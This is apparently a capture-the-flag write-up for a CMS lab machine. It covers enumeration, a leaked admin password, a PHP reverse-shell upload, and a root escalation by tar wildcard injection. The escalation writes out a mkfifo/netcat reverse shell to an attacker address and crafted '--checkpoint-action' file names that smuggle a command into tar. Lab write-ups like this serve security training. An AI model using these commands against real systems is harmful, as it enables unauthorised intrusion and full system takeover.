CmesS
Web enumeration - Gila CMS - Subdomain enumeration - File upload - TAR wildcard injection PrivEsc
Initial Compromise
First thing is to add
10.10.38.29 cmess.thmin our/etc/hostsfile
echo "10.10.38.29 cmess.thm" | sudo tee -a /etc/hostsNmap reveals that 2 ports are open on the target: SSH and HTTP, on their standard ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
| 256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_ 256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThere is a
robots.txtfile that reveals some hidden locations
Disallow: /src/
Disallow: /themes/
Disallow: /lib/When browsing the home page, it reveals that the website is built upon
GilaCMS- Further bruteforcing it gives us
[18:54:00] Starting:
[18:54:01] 200 - 4KB - /index
[18:54:01] 200 - 4KB - /
[18:54:01] 200 - 3KB - /about
[18:54:01] 200 - 4KB - /search
[18:54:01] 200 - 4KB - /blog
[18:54:01] 200 - 4KB - /1
[18:54:02] 200 - 4KB - /01
[18:54:02] 200 - 2KB - /login
[18:54:02] 200 - 4KB - /category
[18:54:02] 200 - 4KB - /0
[18:54:02] 200 - 735B - /feed
[18:54:02] 301 - 318B - /themes -> http://cmess.thm/themes/?url=themes
[18:54:03] 200 - 2KB - /admin
[18:54:04] 301 - 318B - /assets -> http://cmess.thm/assets/?url=assets
[18:54:04] 403 - 274B - /.hta
[18:54:05] 200 - 4KB - /tag
[18:54:05] 200 - 4KB - /author
[18:54:05] 200 - 4KB - /Search
[18:54:05] 301 - 316B - /sites -> http://cmess.thm/sites/?url=sites
[18:54:06] 200 - 3KB - /About
[18:54:06] 301 - 312B - /log -> http://cmess.thm/log/?url=log
[18:54:07] 200 - 4KB - /Index
[18:54:07] 200 - 3KB - /tags
[18:54:07] 200 - 4KB - /1x1
[18:54:07] 301 - 312B - /lib -> http://cmess.thm/lib/?url=lib
[18:54:08] 301 - 312B - /src -> http://cmess.thm/src/?url=src
[18:54:10] 200 - 0B - /api
[18:54:15] 200 - 4KB - /001
[18:54:17] 500 - 0B - /cm
[18:54:22] 200 - 4KB - /1pix
[18:54:24] 200 - 0B - /fm
[18:54:24] 301 - 312B - /tmp -> http://cmess.thm/tmp/?url=tmp
[18:54:26] 200 - 4KB - /1a
[18:54:32] 200 - 4KB - /0001
[18:54:34] 200 - 4KB - /1x1transparent
[18:54:38] 200 - 4KB - /INDEX
[18:54:39] 200 - 4KB - /1px
[18:54:59] 200 - 4KB - /1d
[18:55:03] 200 - 4KB - /1_1
[18:55:17] 200 - 4KB - /Author
[REDACTED]The most interesting locations are probably
/loginand/admin, but we don’t have credentials, and are instructed not to brute force the autentication - So, Let's dig for any subdomains :)We can use tools such as
ffuforwfuzz
$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://cmess.thm/
Total requests: 4997
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000019: 200 30 L 104 W 934 Ch "dev"
Total time: 68.70782
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 72.72825Let's add that new subdomain in our
/etc/hostsfile - Now, let’s see what we can get from this subdomain
$ curl -s dev.cmess.thm | html2text
***** Development Log *****
**** andre@cmess.thm ****
Have you guys fixed the bug that was found on live?
**** support@cmess.thm ****
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're
hoping to patch it in the upcoming patch!
**** support@cmess.thm ****
Update! We have had to delay the patch due to unforeseen circumstances
**** andre@cmess.thm ****
That's ok, can you guys reset my password if you get a moment, I seem to be
unable to get onto the admin panel.
**** support@cmess.thm ****
Your password has been reset. Here: KPFTN_f2yxe%We are provided with an email address and a password. Now you can log in in the
/admindirectory
Email: `andre@cmess.thm`
Password: `KPFTN_f2yxe%`Once logged in, go to
Content > File Manager.Now, download a PHP shell, add a file named
shell.phpin theassetsdirectory and put the content of the PHP reverse shell - Get awww-datashell :)
Lateral Movement
Checking the
/etc/passwdfile gives us another system user calledandre, So lets hunt for any misconfigurations which will make usandre:)Fortunately checking the
/optdirectory gives us a.password.bakfile which had clear text credentials for the user andre - Tried connecting it with the ssh service and we get a stable shell now :)
Privilege Escalation
There was a
tarwildcard injection found in the/etc/crontab- which was running every two minutes -
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *So asusual check for this particular misconfig on gtfobins and shoot the queries :)
$ cat > /home/andre/backup/rev << EOF
#!/bin/bash
rm /tmp/f
mkfifo /tmp/f
cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.54 4444 >/tmp/f
EOF
$ echo "" > "/home/andre/backup/--checkpoint=1"
$ echo "" > "/home/andre/backup/--checkpoint-action=exec=sh rev"After 2 minutes
$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.185.45.
Ncat: Connection from 10.10.185.45:52344.
/bin/sh: 0: can't access tty; job control turned off
# whoami
rootLast updated